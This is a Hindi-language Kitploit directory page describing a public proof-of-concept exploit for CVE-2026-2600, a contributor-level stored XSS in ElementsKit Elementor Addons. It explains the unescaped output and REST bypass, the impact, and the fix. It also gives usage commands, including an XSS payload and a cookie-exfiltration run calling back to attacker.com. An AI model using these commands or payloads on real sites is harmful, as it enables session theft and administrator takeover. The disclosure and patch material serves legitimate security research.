Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-2600-POC — CVE-2026-2600 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, ElementsKit Elementor Addons <= 3.7.9 में एक स्टोर्ड XSS, जो प्रमाणित योगदानकर्ताओं (Contributors) को तैयार किए गए Elementor डेटा के माध्यम से मनमानी स्क्रिप्ट इंजेक्ट करने की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/folks-iwd/cve-2026-2600-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubfolks-iwd/cve-2026-2600-poc

CVE-2026-2600-POC

CVE-2026-2600 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, ElementsKit Elementor Addons <= 3.7.9 में एक स्टोर्ड XSS, जो प्रमाणित योगदानकर्ताओं (Contributors) को तैयार किए गए Elementor डेटा के माध्यम से मनमानी स्क्रिप्ट इंजेक्ट करने की अनुमति देता है।

रिपॉजिटरी देखें
14 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-2600

ElementsKit Elementor Addons <= 3.7.9 — प्रमाणित (योगदानकर्ता+) संग्रहीत क्रॉस-साइट स्क्रिप्टिंग

CVSS6.4 मध्यम
प्रभावित<= 3.7.9
पैच किया गया3.8.0
न्यूनतम भूमिकायोगदानकर्ता (edit_posts)
वेक्टरनेटवर्क / कम जटिलता / कम विशेषाधिकार

बग

सिंपल टैब विजेट टैब शीर्षकों को echo किए गए HTML के साथ प्रस्तुत करता है लेकिन आउटपुट एस्केपिंग के बिना। widgets/tab/tab.php में, रेंडर लूप निम्न कार्य करता है:

root@kitploit:~
foreach ( $settings['ekit_tab_items'] as $index => $item ) {
    echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
}

एलिमेंटर का एडिटर क्लाइंट साइड पर इनपुट को सैनिटाइज़ करता है, लेकिन REST API एंडपॉइंट (/wp-json/wp/v2/posts/{id}) _elementor_data मेटा फ़ील्ड को सीधे स्वीकार करता है और उस परत को पूरी तरह से बायपास कर देता है।

एक प्रमाणित योगदानकर्ता एक क्राफ्टेड एलिमेंटर JSON पेलोड के साथ एक पोस्ट को PATCH कर सकता है जो ekit_tab_title को मनमाने HTML पर सेट करता है। क्योंकि मान _elementor_data में शब्दशः संग्रहीत होता है और रेंडर समय पर esc_html() के बिना echo किया जाता है, स्क्रिप्ट पृष्ठ लोड होने पर हर आगंतुक के ब्राउज़र में निष्पादित होती है।

प्रभाव

कोई भी योगदानकर्ता कर सकता है:

  • सभी साइट आगंतुकों, जिनमें व्यवस्थापक भी शामिल हैं, से सत्र कुकीज़ और प्रमाणीकरण टोकन चुरा सकता है
  • व्यवस्थापक खातों को हाईजैक कर सकता है और पूर्ण साइट अधिग्रहण तक बढ़ सकता है
  • चुपचाप कीलॉगर या क्रेडेंशियल-हार्वेस्टिंग ओवरले तैनात कर सकता है
  • आगंतुकों को फ़िशिंग पृष्ठों या मैलवेयर वितरण साइटों पर पुनर्निर्देशित कर सकता है
  • पृष्ठों को स्थायी रूप से विरूपित कर सकता है — पेलोड मैन्युअल रूप से हटाए जाने तक जीवित रहता है

प्रकटीकरण के समय 400K+ सक्रिय इंस्टॉल प्रभावित थे।

उपयोग

root@kitploit:~
pip install requests
python3 poc.py https://target.com contributor p4ss

स्क्रिप्ट HTTP पर प्रमाणित होती है, व्यवस्थापक संपादक से REST नॉन्स प्राप्त करती है, एक ड्राफ्ट पोस्ट बनाती है, ekit_tab_title फ़ील्ड में एम्बेडेड XSS पेलोड के साथ _elementor_data को पैच करती है, और पोस्ट प्रकाशित करती है। आउटपुट पुष्टि करता है कि पेलोड पृष्ठ स्रोत में सक्रिय है या नहीं।

root@kitploit:~
# कस्टम पेलोड
python3 poc.py https://target.com contributor p4ss --payload '<script>alert(document.domain)</script>'

# कॉलबैक के साथ कुकी एक्सफिल्ट्रेशन
python3 poc.py https://target.com contributor p4ss --type cookie --callback https://attacker.com/steal

# इंटरैक्टिव कंसोल मोड
python3 console_poc.py

पूर्ण विवरण

https://folks-iwd.github.io/writeups/cve-2026-2600.html

प्रकटीकरण समयरेखा

तिथिघटना
जनवरी 2026SVN डिफ समीक्षा के माध्यम से खोजा गया। PoC की पुष्टि हुई।
जनवरी 2026पूर्ण विवरण और PoC के साथ पैचस्टैक एलायंस को रिपोर्ट किया गया।
मार्च 2026Wpmet ने v3.8.0 में फिक्स जारी किया।
अप्रैल 2026CVE-2026-2600 प्रकाशित हुआ। CVSS 6.4 मध्यम निर्धारित किया गया।

पैच

Wpmet ने widgets/tab/tab.php में टैब शीर्षक आउटपुट के चारों ओर esc_html() जोड़ा:

root@kitploit:~
- echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
+ echo '<a ...>' . esc_html( $item['ekit_tab_title'] ) . '</a>';
टूल डाउनलोड करें